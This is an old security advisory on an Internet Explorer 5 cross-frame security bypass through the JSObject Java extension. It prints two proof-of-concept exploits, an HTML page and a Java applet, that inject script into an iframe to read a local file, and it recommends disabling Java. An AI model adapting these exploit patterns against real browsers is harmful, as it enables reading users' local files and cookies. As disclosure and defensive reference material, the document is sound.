COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE5

PROBLEM

    Following  is  based  on  Georgi  Guninski  security advisory #10.
    Internet  Explorer  5.01  under  Windows  98  (suppose  all  other
    versions are  also vulnerable)  allows circumventing  "Cross frame
    security  policy"  by  accessing   the  DOM  of  documents   using
    Java/JavaScript.   This  exposes  the  whole  DOM  of  the  target
    document and opens  lots of security  risks.  This  allows reading
    local files, reading files from any host, window spoofing, getting
    cookies, etc.

    It is not  a bug in  implementation of "Java".  The class JSObject
    that is  the magic  code of  the vulnerability  is not included in
    the  standard   Java  API   and  is   included  in   the   package
    netscape.javascript  that  is  an  extension  library  provided by
    Netscape or Microsoft.  This is NOT  a bug of Java, this is a  bug
    in Microsoft's  implementation of  the extension  Java package for
    JavaScript.

    The code is:

    ------jsinject.html------
    <IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
    <applet MAYSCRIPT code="jsinject">
    <param name="jscode" value="javascript:alert(document.body.innerText)">
    </applet>
    <A HREF="javascript:document.applets[0].doit()">Read the file</A>

    ------jsinject.java------
    import java.applet.Applet;
    import netscape.javascript.*;

    public class jsinject extends Applet {

    public void doit()
    {
      try
       {
        JSObject win = (JSObject) JSObject.getWindow(this);
        JSObject doc = (JSObject) win.getMember("document");
        JSObject I1 =  (JSObject) doc.getMember("I1");
        JSObject loc = (JSObject) I1.getMember("location");
        loc.setMember("href",getParameter("jscode"));
       }
        catch(Exception x){System.out.println(x.toString());}
    }
    }

    Demonstration is available at:

        http://www.nat.bg/~joro/jsinject.html

    Here's another code by Hiromitsu Takagi:

    ------jsinject.java-------
    import java.applet.Applet;
    import netscape.javascript.*;
    public class jsinject extends Applet {
        public void start() {
            try {
                JSObject win = (JSObject)JSObject.getWindow(this);
                JSObject doc = (JSObject)win.getMember("document");
                JSObject I1 = (JSObject)doc.getMember("I1");
                JSObject loc = (JSObject)I1.getMember("location");
                loc.setMember("href", getParameter("jscode"));
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    ------jsinject.html-------
    <IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
    <applet MAYSCRIPT code="jsinject">
    <param name="jscode" value="javascript:alert(document.body.innerText)">
    </applet>

SOLUTION

    The only  solution to  stop the  exploit and  execution of  Active
    Scripting is to disable Java.